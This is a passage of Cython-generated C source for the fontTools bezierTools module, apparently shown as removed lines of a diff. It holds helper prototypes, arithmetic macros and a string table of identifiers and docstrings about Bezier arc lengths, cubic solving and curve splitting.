__Pyx_PySet_ContainsTF(PyObject* key, PyObject* set, int eq); - -/* PyObjectCallMethod0.proto */ -static PyObject* __Pyx_PyObject_CallMethod0(PyObject* obj, PyObject* method_name); - -/* ValidateBasesTuple.proto */ -#if CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API || CYTHON_USE_TYPE_SPECS -static int __Pyx_validate_bases_tuple(const char *type_name, Py_ssize_t dictoffset, PyObject *bases); -#endif - -/* PyType_Ready.proto */ -CYTHON_UNUSED static int __Pyx_PyType_Ready(PyTypeObject *t); - -/* Import.proto */ -static PyObject *__Pyx_Import(PyObject *name, PyObject *from_list, int level); - -/* ImportFrom.proto */ -static PyObject* __Pyx_ImportFrom(PyObject* module, PyObject* name); - -/* ImportDottedModule.proto */ -static PyObject *__Pyx_ImportDottedModule(PyObject *name, PyObject *parts_tuple); -#if PY_MAJOR_VERSION >= 3 -static PyObject *__Pyx_ImportDottedModule_WalkParts(PyObject *module, PyObject *name, PyObject *parts_tuple); -#endif - -/* FastTypeChecks.proto */ -#if CYTHON_COMPILING_IN_CPYTHON -#define __Pyx_TypeCheck(obj, type) __Pyx_IsSubtype(Py_TYPE(obj), (PyTypeObject *)type) -#define __Pyx_TypeCheck2(obj, type1, type2) __Pyx_IsAnySubtype2(Py_TYPE(obj), (PyTypeObject *)type1, (PyTypeObject *)type2) -static CYTHON_INLINE int __Pyx_IsSubtype(PyTypeObject *a, PyTypeObject *b); -static CYTHON_INLINE int __Pyx_IsAnySubtype2(PyTypeObject *cls, PyTypeObject *a, PyTypeObject *b); -static CYTHON_INLINE int __Pyx_PyErr_GivenExceptionMatches(PyObject *err, PyObject *type); -static CYTHON_INLINE int __Pyx_PyErr_GivenExceptionMatches2(PyObject *err, PyObject *type1, PyObject *type2); -#else -#define __Pyx_TypeCheck(obj, type) PyObject_TypeCheck(obj, (PyTypeObject *)type) -#define __Pyx_TypeCheck2(obj, type1, type2) (PyObject_TypeCheck(obj, (PyTypeObject *)type1) || PyObject_TypeCheck(obj, (PyTypeObject *)type2)) -#define __Pyx_PyErr_GivenExceptionMatches(err, type) PyErr_GivenExceptionMatches(err, type) -#define __Pyx_PyErr_GivenExceptionMatches2(err, type1, type2) (PyErr_GivenExceptionMatches(err, type1) || PyErr_GivenExceptionMatches(err, type2)) -#endif -#define __Pyx_PyErr_ExceptionMatches2(err1, err2) __Pyx_PyErr_GivenExceptionMatches2(__Pyx_PyErr_CurrentExceptionType(), err1, err2) -#define __Pyx_PyException_Check(obj) __Pyx_TypeCheck(obj, PyExc_Exception) - -/* CLineInTraceback.proto */ -#ifdef CYTHON_CLINE_IN_TRACEBACK -#define __Pyx_CLineForTraceback(tstate, c_line) (((CYTHON_CLINE_IN_TRACEBACK)) ? c_line : 0) -#else -static int __Pyx_CLineForTraceback(PyThreadState *tstate, int c_line); -#endif - -/* CodeObjectCache.proto */ -#if !CYTHON_COMPILING_IN_LIMITED_API -typedef struct { - PyCodeObject* code_object; - int code_line; -} __Pyx_CodeObjectCacheEntry; -struct __Pyx_CodeObjectCache { - int count; - int max_count; - __Pyx_CodeObjectCacheEntry* entries; -}; -static struct __Pyx_CodeObjectCache __pyx_code_cache = {0,0,NULL}; -static int __pyx_bisect_code_objects(__Pyx_CodeObjectCacheEntry* entries, int count, int code_line); -static PyCodeObject *__pyx_find_code_object(int code_line); -static void __pyx_insert_code_object(int code_line, PyCodeObject* code_object); -#endif - -/* AddTraceback.proto */ -static void __Pyx_AddTraceback(const char *funcname, int c_line, - int py_line, const char *filename); - -/* RealImag.proto */ -#if CYTHON_CCOMPLEX - #ifdef __cplusplus - #define __Pyx_CREAL(z) ((z).real()) - #define __Pyx_CIMAG(z) ((z).imag()) - #else - #define __Pyx_CREAL(z) (__real__(z)) - #define __Pyx_CIMAG(z) (__imag__(z)) - #endif -#else - #define __Pyx_CREAL(z) ((z).real) - #define __Pyx_CIMAG(z) ((z).imag) -#endif -#if defined(__cplusplus) && CYTHON_CCOMPLEX\ - && (defined(_WIN32) || defined(__clang__) || (defined(__GNUC__) && (__GNUC__ >= 5 || __GNUC__ == 4 && __GNUC_MINOR__ >= 4 )) || __cplusplus >= 201103) - #define __Pyx_SET_CREAL(z,x) ((z).real(x)) - #define __Pyx_SET_CIMAG(z,y) ((z).imag(y)) -#else - #define __Pyx_SET_CREAL(z,x) __Pyx_CREAL(z) = (x) - #define __Pyx_SET_CIMAG(z,y) __Pyx_CIMAG(z) = (y) -#endif - -/* Arithmetic.proto */ -#if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) - #define __Pyx_c_eq_double(a, b) ((a)==(b)) - #define __Pyx_c_sum_double(a, b) ((a)+(b)) - #define __Pyx_c_diff_double(a, b) ((a)-(b)) - #define __Pyx_c_prod_double(a, b) ((a)*(b)) - #define __Pyx_c_quot_double(a, b) ((a)/(b)) - #define __Pyx_c_neg_double(a) (-(a)) - #ifdef __cplusplus - #define __Pyx_c_is_zero_double(z) ((z)==(double)0) - #define __Pyx_c_conj_double(z) (::std::conj(z)) - #if 1 - #define __Pyx_c_abs_double(z) (::std::abs(z)) - #define __Pyx_c_pow_double(a, b) (::std::pow(a, b)) - #endif - #else - #define __Pyx_c_is_zero_double(z) ((z)==0) - #define __Pyx_c_conj_double(z) (conj(z)) - #if 1 - #define __Pyx_c_abs_double(z) (cabs(z)) - #define __Pyx_c_pow_double(a, b) (cpow(a, b)) - #endif - #endif -#else - static CYTHON_INLINE int __Pyx_c_eq_double(__pyx_t_double_complex, __pyx_t_double_complex); - static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_sum_double(__pyx_t_double_complex, __pyx_t_double_complex); - static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_diff_double(__pyx_t_double_complex, __pyx_t_double_complex); - static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_prod_double(__pyx_t_double_complex, __pyx_t_double_complex); - static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_quot_double(__pyx_t_double_complex, __pyx_t_double_complex); - static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_neg_double(__pyx_t_double_complex); - static CYTHON_INLINE int __Pyx_c_is_zero_double(__pyx_t_double_complex); - static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_conj_double(__pyx_t_double_complex); - #if 1 - static CYTHON_INLINE double __Pyx_c_abs_double(__pyx_t_double_complex); - static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_pow_double(__pyx_t_double_complex, __pyx_t_double_complex); - #endif -#endif - -/* FromPy.proto */ -static __pyx_t_double_complex __Pyx_PyComplex_As___pyx_t_double_complex(PyObject*); - -/* ToPy.proto */ -#define __pyx_PyComplex_FromComplex(z)\ - PyComplex_FromDoubles((double)__Pyx_CREAL(z),\ - (double)__Pyx_CIMAG(z)) - -/* GCCDiagnostics.proto */ -#if !defined(__INTEL_COMPILER) && defined(__GNUC__) && (__GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 6)) -#define __Pyx_HAS_GCC_DIAGNOSTIC -#endif - -/* CIntToPy.proto */ -static CYTHON_INLINE PyObject* __Pyx_PyInt_From_long(long value); - -/* FormatTypeName.proto */ -#if CYTHON_COMPILING_IN_LIMITED_API -typedef PyObject *__Pyx_TypeName; -#define __Pyx_FMT_TYPENAME "%U" -static __Pyx_TypeName __Pyx_PyType_GetName(PyTypeObject* tp); -#define __Pyx_DECREF_TypeName(obj) Py_XDECREF(obj) -#else -typedef const char *__Pyx_TypeName; -#define __Pyx_FMT_TYPENAME "%.200s" -#define __Pyx_PyType_GetName(tp) ((tp)->tp_name) -#define __Pyx_DECREF_TypeName(obj) -#endif - -/* CIntFromPy.proto */ -static CYTHON_INLINE long __Pyx_PyInt_As_long(PyObject *); - -/* CIntFromPy.proto */ -static CYTHON_INLINE int __Pyx_PyInt_As_int(PyObject *); - -/* CheckBinaryVersion.proto */ -static unsigned long __Pyx_get_runtime_version(); -static int __Pyx_check_binary_version(unsigned long ct_version, unsigned long rt_version, int allow_newer); - -/* InitStrings.proto */ -static int __Pyx_InitStrings(__Pyx_StringTabEntry *t); - -/* #### Code section: module_declarations ### */ - -/* Module declarations from "cython" */ - -/* Module declarations from "fontTools.misc.bezierTools" */ -static CYTHON_INLINE double __pyx_f_9fontTools_4misc_11bezierTools__dot(__pyx_t_double_complex, __pyx_t_double_complex); /*proto*/ -static CYTHON_INLINE double __pyx_f_9fontTools_4misc_11bezierTools__intSecAtan(double); /*proto*/ -static CYTHON_INLINE PyObject *__pyx_f_9fontTools_4misc_11bezierTools_calcCubicParametersC(__pyx_t_double_complex, __pyx_t_double_complex, __pyx_t_double_complex, __pyx_t_double_complex); /*proto*/ -static CYTHON_INLINE PyObject *__pyx_f_9fontTools_4misc_11bezierTools_calcCubicPointsC(__pyx_t_double_complex, __pyx_t_double_complex, __pyx_t_double_complex, __pyx_t_double_complex); /*proto*/ -/* #### Code section: typeinfo ### */ -/* #### Code section: before_global_var ### */ -#define __Pyx_MODULE_NAME "fontTools.misc.bezierTools" -extern int __pyx_module_is_main_fontTools__misc__bezierTools; -int __pyx_module_is_main_fontTools__misc__bezierTools = 0; - -/* Implementation of "fontTools.misc.bezierTools" */ -/* #### Code section: global_var ### */ -static PyObject *__pyx_builtin_AttributeError; -static PyObject *__pyx_builtin_ImportError; -static PyObject *__pyx_builtin_range; -static PyObject *__pyx_builtin_round; -static PyObject *__pyx_builtin_ValueError; -static PyObject *__pyx_builtin_TypeError; -static PyObject *__pyx_builtin_print; -/* #### Code section: string_decls ### */ -static const char __pyx_k_Q[] = "Q"; -static const char __pyx_k_R[] = "R"; -static const char __pyx_k_a[] = "a"; -static const char __pyx_k_b[] = "b"; -static const char __pyx_k_c[] = "c"; -static const char __pyx_k_d[] = "d"; -static const char __pyx_k_e[] = "e"; -static const char __pyx_k_g[] = "%g"; -static const char __pyx_k_i[] = "i"; -static const char __pyx_k_n[] = "n"; -static const char __pyx_k_r[] = "r"; -static const char __pyx_k_s[] = "s"; -static const char __pyx_k_t[] = "t"; -static const char __pyx_k_x[] = "x"; -static const char __pyx_k_y[] = "y"; -static const char __pyx_k_DD[] = "DD"; -static const char __pyx_k_Q3[] = "Q3"; -static const char __pyx_k_R2[] = "R2"; -static const char __pyx_k__9[] = ", "; -static const char __pyx_k_a1[] = "a1"; -static const char __pyx_k_a2[] = "a2"; -static const char __pyx_k_a3[] = "a3"; -static const char __pyx_k_ax[] = "ax"; -static const char __pyx_k_ay[] = "ay"; -static const char __pyx_k_b1[] = "b1"; -static const char __pyx_k_bx[] = "bx"; -static const char __pyx_k_by[] = "by"; -static const char __pyx_k_c1[] = "c1"; -static const char __pyx_k_cx[] = "cx"; -static const char __pyx_k_cy[] = "cy"; -static const char __pyx_k_d0[] = "d0"; -static const char __pyx_k_d1[] = "d1"; -static const char __pyx_k_dx[] = "dx"; -static const char __pyx_k_dy[] = "dy"; -static const char __pyx_k_e1[] = "e1"; -static const char __pyx_k_e2[] = "e2"; -static const char __pyx_k_ex[] = "ex"; -static const char __pyx_k_ey[] = "ey"; -static const char __pyx_k_gc[] = "gc"; -static const char __pyx_k_it[] = "it"; -static const char __pyx_k_p0[] = "p0"; -static const char __pyx_k_p1[] = "p1"; -static const char __pyx_k_p2[] = "p2"; -static const char __pyx_k_p3[] = "p3"; -static const char __pyx_k_pi[] = "pi"; -static const char __pyx_k_pt[] = "pt"; -static const char __pyx_k_px[] = "px"; -static const char __pyx_k_py[] = "py"; -static const char __pyx_k_s1[] = "s1"; -static const char __pyx_k_s2[] = "s2"; -static const char __pyx_k_sx[] = "sx"; -static const char __pyx_k_sy[] = "sy"; -static const char __pyx_k_t1[] = "t1"; -static const char __pyx_k_t2[] = "t2"; -static const char __pyx_k_ts[] = "ts"; -static const char __pyx_k_v0[] = "v0"; -static const char __pyx_k_v1[] = "v1"; -static const char __pyx_k_v2[] = "v2"; -static const char __pyx_k_v3[] = "v3"; -static const char __pyx_k_v4[] = "v4"; -static const char __pyx_k_x0[] = "x0"; -static const char __pyx_k_x1[] = "x1"; -static const char __pyx_k_x2[] = "x2"; -static const char __pyx_k_x3[] = "x3"; -static const char __pyx_k_x4[] = "x4"; -static const char __pyx_k_y1[] = "y1"; -static const char __pyx_k_y2[] = "y2"; -static const char __pyx_k_y3[] = "y3"; -static const char __pyx_k_y4[] = "y4"; -static const char __pyx_k_1_t[] = "_1_t"; -static const char __pyx_k_Len[] = "Len"; -static const char __pyx_k__10[] = "."; -static const char __pyx_k__11[] = "*"; -static const char __pyx_k__91[] = "_"; -static const char __pyx_k_a1x[] = "a1x"; -static const char __pyx_k_a1y[] = "a1y"; -static const char __pyx_k_all[] = "__all__"; -static const char __pyx_k_ax2[] = "ax2"; -static const char __pyx_k_ax3[] = "ax3"; -static const char __pyx_k_ay2[] = "ay2"; -static const char __pyx_k_ay3[] = "ay3"; -static const char __pyx_k_b1x[] = "b1x"; -static const char __pyx_k_b1y[] = "b1y"; -static const char __pyx_k_box[] = "box"; -static const char __pyx_k_bx2[] = "bx2"; -static const char __pyx_k_by2[] = "by2"; -static const char __pyx_k_c11[] = "c11"; -static const char __pyx_k_c12[] = "c12"; -static const char __pyx_k_c1x[] = "c1x"; -static const char __pyx_k_c1y[] = "c1y"; -static const char __pyx_k_c21[] = "c21"; -static const char __pyx_k_c22[] = "c22"; -static const char __pyx_k_cos[] = "cos"; -static const char __pyx_k_d1x[] = "d1x"; -static const char __pyx_k_d1y[] = "d1y"; -static const char __pyx_k_e1x[] = "e1x"; -static const char __pyx_k_e1y[] = "e1y"; -static const char __pyx_k_e2x[] = "e2x"; -static const char __pyx_k_e2y[] = "e2y"; -static const char __pyx_k_end[] = "end"; -static const char __pyx_k_key[] = "key"; -static const char __pyx_k_mid[] = "mid"; -static const char __pyx_k_obj[] = "obj"; -static const char __pyx_k_one[] = "one"; -static const char __pyx_k_pt1[] = "pt1"; -static const char __pyx_k_pt2[] = "pt2"; -static const char __pyx_k_pt3[] = "pt3"; -static const char __pyx_k_pt4[] = "pt4"; -static const char __pyx_k_rDD[] = "rDD"; -static const char __pyx_k_rQ2[] = "rQ2"; -static const char __pyx_k_s1x[] = "s1x"; -static const char __pyx_k_s1y[] = "s1y"; -static const char __pyx_k_s2x[] = "s2x"; -static const char __pyx_k_s2y[] = "s2y"; -static const char __pyx_k_s_2[] = "(%s)"; -static const char __pyx_k_seg[] = "seg"; -static const char __pyx_k_sys[] = "sys"; -static const char __pyx_k_two[] = "two"; -static const char __pyx_k__103[] = "?"; -static const char __pyx_k_a1_3[] = "a1_3"; -static const char __pyx_k_acos[] = "acos"; -static const char __pyx_k_arch[] = "arch"; -static const char __pyx_k_args[] = "args"; -static const char __pyx_k_exit[] = "exit"; -static const char __pyx_k_line[] = "line"; -static const char __pyx_k_main[] = "__main__"; -static const char __pyx_k_math[] = "math"; -static const char __pyx_k_mult[] = "mult"; -static const char __pyx_k_name[] = "__name__"; -static const char __pyx_k_off1[] = "off1"; -static const char __pyx_k_off2[] = "off2"; -static const char __pyx_k_pt1x[] = "pt1x"; -static const char __pyx_k_pt1y[] = "pt1y"; -static const char __pyx_k_pt2x[] = "pt2x"; -static const char __pyx_k_pt2y[] = "pt2y"; -static const char __pyx_k_seen[] = "seen"; -static const char __pyx_k_seg1[] = "seg1"; -static const char __pyx_k_seg2[] = "seg2"; -static const char __pyx_k_send[] = "send"; -static const char __pyx_k_spec[] = "__spec__"; -static const char __pyx_k_sqrt[] = "sqrt"; -static const char __pyx_k_t1_2[] = "t1_2"; -static const char __pyx_k_t1_3[] = "t1_3"; -static const char __pyx_k_test[] = "__test__"; -static const char __pyx_k_1_t_2[] = "_1_t_2"; -static const char __pyx_k_R2_Q3[] = "R2_Q3"; -static const char __pyx_k_angle[] = "angle"; -static const char __pyx_k_asinh[] = "asinh"; -static const char __pyx_k_atan2[] = "atan2"; -static const char __pyx_k_close[] = "close"; -static const char __pyx_k_curve[] = "curve"; -static const char __pyx_k_delta[] = "delta"; -static const char __pyx_k_found[] = "found"; -static const char __pyx_k_midPt[] = "midPt"; -static const char __pyx_k_print[] = "print"; -static const char __pyx_k_range[] = "range"; -static const char __pyx_k_roots[] = "roots"; -static const char __pyx_k_round[] = "round"; -static const char __pyx_k_scale[] = "scale"; -static const char __pyx_k_start[] = "start"; -static const char __pyx_k_theta[] = "theta"; -static const char __pyx_k_throw[] = "throw"; -static const char __pyx_k_where[] = "where"; -static const char __pyx_k_xDiff[] = "xDiff"; -static const char __pyx_k_yDiff[] = "yDiff"; -static const char __pyx_k_append[] = "append"; -static const char __pyx_k_curve1[] = "curve1"; -static const char __pyx_k_curve2[] = "curve2"; -static const char __pyx_k_cython[] = "cython"; -static const char __pyx_k_deriv3[] = "deriv3"; -static const char __pyx_k_enable[] = "enable"; -static const char __pyx_k_failed[] = "failed"; -static const char __pyx_k_import[] = "__import__"; -static const char __pyx_k_insert[] = "insert"; -static const char __pyx_k_line_t[] = "line_t"; -static const char __pyx_k_origin[] = "origin"; -static const char __pyx_k_points[] = "points"; -static const char __pyx_k_range1[] = "range1"; -static const char __pyx_k_range2[] = "range2"; -static const char __pyx_k_rotate[] = "rotate"; -static const char __pyx_k_xRoots[] = "xRoots"; -static const char __pyx_k_yRoots[] = "yRoots"; -static const char __pyx_k_2_t_1_t[] = "_2_t_1_t"; -static const char __pyx_k_bounds1[] = "bounds1"; -static const char __pyx_k_bounds2[] = "bounds2"; -static const char __pyx_k_delta_2[] = "delta_2"; -static const char __pyx_k_delta_3[] = "delta_3"; -static const char __pyx_k_disable[] = "disable"; -static const char __pyx_k_doctest[] = "doctest"; -static const char __pyx_k_epsilon[] = "epsilon"; -static const char __pyx_k_genexpr[] = "genexpr"; -static const char __pyx_k_isclose[] = "isclose"; -static const char __pyx_k_segment[] = "segment"; -static const char __pyx_k_slope12[] = "slope12"; -static const char __pyx_k_slope34[] = "slope34"; -static const char __pyx_k_swapped[] = "swapped"; -static const char __pyx_k_testmod[] = "testmod"; -static const char __pyx_k_COMPILED[] = "COMPILED"; -static const char __pyx_k_Identity[] = "Identity"; -static const char __pyx_k_midpoint[] = "midpoint"; -static const char __pyx_k_origDist[] = "origDist"; -static const char __pyx_k_pointAtT[] = "pointAtT"; -static const char __pyx_k_rectArea[] = "rectArea"; -static const char __pyx_k_sectRect[] = "sectRect"; -static const char __pyx_k_segments[] = "segments"; -static const char __pyx_k_TypeError[] = "TypeError"; -static const char __pyx_k_c11_range[] = "c11_range"; -static const char __pyx_k_c12_range[] = "c12_range"; -static const char __pyx_k_c21_range[] = "c21_range"; -static const char __pyx_k_c22_range[] = "c22_range"; -static const char __pyx_k_isenabled[] = "isenabled"; -static const char __pyx_k_precision[] = "precision"; -static const char __pyx_k_solutions[] = "solutions"; -static const char __pyx_k_splitLine[] = "splitLine"; -static const char __pyx_k_tolerance[] = "tolerance"; -static const char __pyx_k_translate[] = "translate"; -static const char __pyx_k_ValueError[] = "ValueError"; -static const char __pyx_k_calcBounds[] = "calcBounds"; -static const char __pyx_k_intersects[] = "intersects"; -static const char __pyx_k_namedtuple[] = "namedtuple"; -static const char __pyx_k_solveCubic[] = "solveCubic"; -static const char __pyx_k_splitCubic[] = "splitCubic"; -static const char __pyx_k_unique_key[] = "unique_key"; -static const char __pyx_k_ImportError[] = "ImportError"; -static const char __pyx_k_collections[] = "collections"; -static const char __pyx_k_pointFinder[] = "pointFinder"; -static const char __pyx_k_segmentrepr[] = "_segmentrepr"; -static const char __pyx_k_Intersection[] = "Intersection"; -static const char __pyx_k_curve_bounds[] = "_curve_bounds"; -static const char __pyx_k_initializing[] = "_initializing"; -static const char __pyx_k_isHorizontal[] = "isHorizontal"; -static const char __pyx_k_is_coroutine[] = "_is_coroutine"; -static const char __pyx_k_linePointAtT[] = "linePointAtT"; -static const char __pyx_k_line_t_of_pt[] = "_line_t_of_pt"; -static const char __pyx_k_aligned_curve[] = "aligned_curve"; -static const char __pyx_k_class_getitem[] = "__class_getitem__"; -static const char __pyx_k_cubicPointAtT[] = "cubicPointAtT"; -static const char __pyx_k_epsilonDigits[] = "epsilonDigits"; -static const char __pyx_k_intersections[] = "intersections"; -static const char __pyx_k_printSegments[] = "printSegments"; -static const char __pyx_k_splitCubicAtT[] = "_splitCubicAtT"; -static const char __pyx_k_unique_values[] = "unique_values"; -static const char __pyx_k_AttributeError[] = "AttributeError"; -static const char __pyx_k_cubicPointAtTC[] = "cubicPointAtTC"; -static const char __pyx_k_fontTools_misc[] = "fontTools.misc"; -static const char __pyx_k_solveQuadratic[] = "solveQuadratic"; -static const char __pyx_k_splitCubicAtTC[] = "splitCubicAtTC"; -static const char __pyx_k_splitQuadratic[] = "splitQuadratic"; -static const char __pyx_k_calcCubicBounds[] = "calcCubicBounds"; -static const char __pyx_k_calcCubicPoints[] = "calcCubicPoints"; -static const char __pyx_k_intersection_ts[] = "intersection_ts"; -static const char __pyx_k_segmentPointAtT[] = "segmentPointAtT"; -static const char __pyx_k_splitCubicAtT_2[] = "splitCubicAtT"; -static const char __pyx_k_transformPoints[] = "transformPoints"; -static const char __pyx_k_splitCubicAtTC_2[] = "_splitCubicAtTC"; -static const char __pyx_k_quadraticPointAtT[] = "quadraticPointAtT"; -static const char __pyx_k_splitQuadraticAtT[] = "_splitQuadraticAtT"; -static const char __pyx_k_asyncio_coroutines[] = "asyncio.coroutines"; -static const char __pyx_k_calcCubicArcLength[] = "calcCubicArcLength"; -static const char __pyx_k_cline_in_traceback[] = "cline_in_traceback"; -static const char __pyx_k_splitLine_line_450[] = "splitLine (line 450)"; -static const char __pyx_k_split_segment_at_t[] = "_split_segment_at_t"; -static const char __pyx_k_calcCubicArcLengthC[] = "calcCubicArcLengthC"; -static const char __pyx_k_calcCubicParameters[] = "calcCubicParameters"; -static const char __pyx_k_calcQuadraticBounds[] = "calcQuadraticBounds"; -static const char __pyx_k_calcQuadraticPoints[] = "calcQuadraticPoints"; -static const char __pyx_k_solveCubic_line_841[] = "solveCubic (line 841)"; -static const char __pyx_k_splitCubic_line_552[] = "splitCubic (line 552)"; -static const char __pyx_k_splitQuadraticAtT_2[] = "splitQuadraticAtT"; -static const char __pyx_k_Unknown_curve_degree[] = "Unknown curve degree"; -static const char __pyx_k_split_cubic_into_two[] = "_split_cubic_into_two"; -static const char __pyx_k_lineLineIntersections[] = "lineLineIntersections"; -static const char __pyx_k_segmentrepr_line_1449[] = "_segmentrepr (line 1449)"; -static const char __pyx_k_splitCubicIntoTwoAtTC[] = "splitCubicIntoTwoAtTC"; -static const char __pyx_k_calcQuadraticArcLength[] = "calcQuadraticArcLength"; -static const char __pyx_k_curveLineIntersections[] = "curveLineIntersections"; -static const char __pyx_k_splitCubicAtT_line_613[] = "splitCubicAtT (line 613)"; -static const char __pyx_k_calcQuadraticArcLengthC[] = "calcQuadraticArcLengthC"; -static const char __pyx_k_calcQuadraticParameters[] = "calcQuadraticParameters"; -static const char __pyx_k_curveCurveIntersections[] = "curveCurveIntersections"; -static const char __pyx_k_splitQuadratic_line_507[] = "splitQuadratic (line 507)"; -static const char __pyx_k_alignment_transformation[] = "_alignment_transformation"; -static const char __pyx_k_calcCubicBounds_line_412[] = "calcCubicBounds (line 412)"; -static const char __pyx_k_fontTools_misc_transform[] = "fontTools.misc.transform"; -static const char __pyx_k_approximateCubicArcLength[] = "approximateCubicArcLength"; -static const char __pyx_k_fontTools_misc_arrayTools[] = "fontTools.misc.arrayTools"; -static const char __pyx_k_splitCubic_locals_genexpr[] = "splitCubic..genexpr"; -static const char __pyx_k_approximateCubicArcLengthC[] = "approximateCubicArcLengthC"; -static const char __pyx_k_calcCubicArcLengthCRecurse[] = "_calcCubicArcLengthCRecurse"; -static const char __pyx_k_curve_line_intersections_t[] = "_curve_line_intersections_t"; -static const char __pyx_k_fontTools_misc_bezierTools[] = "fontTools.misc.bezierTools"; -static const char __pyx_k_segmentrepr_locals_genexpr[] = "_segmentrepr..genexpr"; -static const char __pyx_k_splitQuadraticAtT_line_589[] = "splitQuadraticAtT (line 589)"; -static const char __pyx_k_curve_curve_intersections_t[] = "_curve_curve_intersections_t"; -static const char __pyx_k_segmentSegmentIntersections[] = "segmentSegmentIntersections"; -static const char __pyx_k_calcQuadraticBounds_line_298[] = "calcQuadraticBounds (line 298)"; -static const char __pyx_k_approximateQuadraticArcLength[] = "approximateQuadraticArcLength"; -static const char __pyx_k_segmentrepr_1_2_3_2_3_4_0_1_2[] = "\n >>> _segmentrepr([1, [2, 3], [], [[2, [3, 4], [0.1, 2.2]]]])\n '(1, (2, 3), (), ((2, (3, 4), (0.1, 2.2))))'\n "; -static const char __pyx_k_splitQuadratic_locals_genexpr[] = "splitQuadratic..genexpr"; -static const char __pyx_k_approximateQuadraticArcLengthC[] = "approximateQuadraticArcLengthC"; -static const char __pyx_k_Approximates_the_arc_length_for[] = "Approximates the arc length for a cubic Bezier segment.\n\n Uses Gauss-Lobatto quadrature with n=5 points to approximate arc length.\n See :func:`calcCubicArcLength` for a slower but more accurate result.\n\n Args:\n pt1,pt2,pt3,pt4: Control points of the Bezier as 2D tuples.\n\n Returns:\n Arc length value.\n\n Example::\n\n >>> approximateCubicArcLength((0, 0), (25, 100), (75, 100), (100, 0))\n 190.04332968932817\n >>> approximateCubicArcLength((0, 0), (50, 0), (100, 50), (100, 100))\n 154.8852074945903\n >>> approximateCubicArcLength((0, 0), (50, 0), (100, 0), (150, 0)) # line; exact result should be 150.\n 149.99999999999991\n >>> approximateCubicArcLength((0, 0), (50, 0), (100, 0), (-50, 0)) # cusp; exact result should be 150.\n 136.9267662156362\n >>> approximateCubicArcLength((0, 0), (50, 0), (100, -50), (-50, 0)) # cusp\n 154.80848416537057\n "; -static const char __pyx_k_Calculates_the_arc_length_for_a[] = "Calculates the arc length for a quadratic Bezier segment.\n\n Args:\n pt1: Start point of the Bezier as 2D tuple.\n pt2: Handle point of the Bezier as 2D tuple.\n pt3: End point of the Bezier as 2D tuple.\n\n Returns:\n Arc length value.\n\n Example::\n\n >>> calcQuadraticArcLength((0, 0), (0, 0), (0, 0)) # empty segment\n 0.0\n >>> calcQuadraticArcLength((0, 0), (50, 0), (80, 0)) # collinear points\n 80.0\n >>> calcQuadraticArcLength((0, 0), (0, 50), (0, 80)) # collinear points vertical\n 80.0\n >>> calcQuadraticArcLength((0, 0), (50, 20), (100, 40)) # collinear points\n 107.70329614269008\n >>> calcQuadraticArcLength((0, 0), (0, 100), (100, 0))\n 154.02976155645263\n >>> calcQuadraticArcLength((0, 0), (0, 50), (100, 0))\n 120.21581243984076\n >>> calcQuadraticArcLength((0, 0), (50, -10), (80, 50))\n 102.53273816445825\n >>> calcQuadraticArcLength((0, 0), (40, 0), (-40, 0)) # collinear points, control point outside\n 66.66666666666667\n >>> calcQuadraticArcLength((0, 0), (40, 0), (0, 0)) # collinear points, looping back\n 40.0\n "; -static const char __pyx_k_Finds_intersections_between_two[] = "Finds intersections between two line segments.\n\n Args:\n s1, e1: Coordinates of the first line as 2D tuples.\n s2, e2: Coordinates of the second line as 2D tuples.\n\n Returns:\n A list of ``Intersection`` objects, each object having ``pt``, ``t1``\n and ``t2`` attributes containing the intersection point, time on first\n segment and time on second segment respectively.\n\n Examples::\n\n >>> a = lineLineIntersections( (310,389), (453, 222), (289, 251), (447, 367))\n >>> len(a)\n 1\n >>> intersection = a[0]\n >>> intersection.pt\n (374.44882952482897, 313.73458370177315)\n >>> (intersection.t1, intersection.t2)\n (0.45069111555824465, 0.5408153767394238)\n "; -static const char __pyx_k_Solve_a_cubic_equation_Solves_a[] = "Solve a cubic equation.\n\n Solves *a*x*x*x + b*x*x + c*x + d = 0* where a, b, c and d are real.\n\n Args:\n a: coefficient of *x\302\263*\n b: coefficient of *x\302\262*\n c: coefficient of *x*\n d: constant term\n\n Returns:\n A list of roots. Note that the returned list is neither guaranteed to\n be sorted nor to contain unique values!\n\n Examples::\n\n >>> solveCubic(1, 1, -6, 0)\n [-3.0, -0.0, 2.0]\n >>> solveCubic(-10.0, -9.0, 48.0, -29.0)\n [-2.9, 1.0, 1.0]\n >>> solveCubic(-9.875, -9.0, 47.625, -28.75)\n [-2.911392, 1.0, 1.0]\n >>> solveCubic(1.0, -4.5, 6.75, -3.375)\n [1.5, 1.5, 1.5]\n >>> solveCubic(-12.0, 18.0, -9.0, 1.50023651123)\n [0.5, 0.5, 0.5]\n >>> solveCubic(\n ... 9.0, 0.0, 0.0, -7.62939453125e-05\n ... ) == [-0.0, -0.0, -0.0]\n True\n "; -static const char __pyx_k_Split_a_cubic_Bezier_curve_at_a[] = "Split a cubic Bezier curve at a given coordinate.\n\n Args:\n pt1,pt2,pt3,pt4: Control points of the Bezier as 2D tuples.\n where: Position at which to split the curve.\n isHorizontal: Direction of the ray splitting the curve. If true,\n ``where`` is interpreted as a Y coordinate; if false, then\n ``where`` is interpreted as an X coordinate.\n\n Returns:\n A list of two curve segments (each curve segment being four 2D tuples)\n if the curve was successfully split, or a list containing the original\n curve.\n\n Example::\n\n >>> printSegments(splitCubic((0, 0), (25, 100), (75, 100), (100, 0), 150, False))\n ((0, 0), (25, 100), (75, 100), (100, 0))\n >>> printSegments(splitCubic((0, 0), (25, 100), (75, 100), (100, 0), 50, False))\n ((0, 0), (12.5, 50), (31.25, 75), (50, 75))\n ((50, 75), (68.75, 75), (87.5, 50), (100, 0))\n >>> printSegments(splitCubic((0, 0), (25, 100), (75, 100), (100, 0), 25, True))\n ((0, 0), (2.29379, 9.17517), (4.79804, 17.5085), (7.47414, 25))\n ((7.47414, 25), (31.2886, 91.6667), (68.7114, 91.6667), (92.5259, 25))\n ((92.5259, 25), (95.202, 17.5085), (97.7062, 9.17517), (100, 1.77636e-15))\n "; -static const char 